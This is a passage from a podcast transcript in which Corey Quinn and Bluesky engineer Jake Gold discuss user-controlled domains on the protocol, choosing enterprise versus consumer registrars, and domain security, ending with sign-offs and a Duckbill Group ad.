can change your domain, you can change, you know which PDS you're on, it's all completely controlled by you. And there's nearly no way we as a company can do anything to change that. Like, that's all sort of locked into the way that the protocol works, which creates this really great incentive where, you know, if we want to provide you services or somebody else wants to provide you services, they just have to compete on doing a really good job; you're not locked in. And that's, like, one of my favorite features of the network.Corey: I just want to point something out because you mentioned oh, we're big fans of Namecheap. I am too, for weird half-drunk domain registrations on a lark. Like, “Why am I poor?” It's like, $3,000 a month of my budget goes to domain purchases, great. But I did a quick whois on the official Bluesky domain and it's hosted at Route 53, which is Amazon's, of course, premier database offering.But I'm a big fan of using a enterprise registrar for enterprise-y things. Wasabi, if I recall correctly, wound up having their primary domain registered through GoDaddy, and the public domain that their bucket equivalent would serve data out of got shut down for 12 hours because some bad actor put something there that shouldn't have been. And GoDaddy is not an enterprise registrar, despite what they might think—for God's sake, the word ‘daddy' is in their name. Do you really think that's enterprise? Good luck.So, the fact that you have a responsible company handling these central singular points of failure speaks very well to just your own implementation of these things. Because that's the sort of thing that everyone figures out the second time.Jake: Yeah, yeah. I think there's a big difference between corporate domain registration, and corporate DNS and, like, your personal handle on social networking. I think a lot of the consumer, sort of, domain registries are—registrars—are great for consumers. And I think if you—yeah, you're running a big corporate domain, you want to make sure it's, you know, it's transfer locked and, you know, there's two-factor authentication and doing all those kinds of things right because that is a single point of failure; you can lose a lot by having your domain taken. So, I completely agree with you on there.Corey: Oh, absolutely. I am curious about this to see if it's still the case or not because I haven't checked this in over a year—and they did fix it. Okay. As of at least when we're recording this, which is the end of May 2023, Amazon's Authoritative Name Servers are no longer half at Oracle. Good for them. They now have a bunch of Amazon-specific name servers on them instead of, you know, their competitor that they clearly despise. Good work, good work.I really want to thank you for taking the time to speak with me about how you're viewing these things and honestly giving me a chance to go ambling down memory lane. If people want to learn more about what you're up to, where's the best place for them to find you?Jake: Yeah, so I'm on Bluesky. It's invite only. I apologize for that right now. But if you check out bsky.app, you can see how to sign up for the waitlist, and we are trying to get people on as quickly as possible.Corey: And I will, of course, be talking to you there and will put links to that in the show notes. Thank you so much for taking the time to speak with me. I really appreciate it.Jake: Thanks a lot, Corey. It was great.Corey: Jake Gold, infrastructure engineer at Bluesky, slash Blue-ski. I'm Cloud Economist Corey Quinn and this is Screaming in the Cloud. If you've enjoyed this podcast, please leave a five-star review on your podcast platform of choice, whereas if you've hated this podcast, please leave a five-star review on your podcast platform of choice, along with an angry comment that will no doubt result in a surprise $60,000 bill after you posted.Corey: If your AWS bill keeps rising and your blood pressure is doing the same, then you need The Duckbill Group. We help companies fix their AWS bill by making it smaller and less horrifying. The Duckbill Group works for you, not AWS. We tailor recommendations to your business and we get to the point. Visit duckbillgroup.com to get started.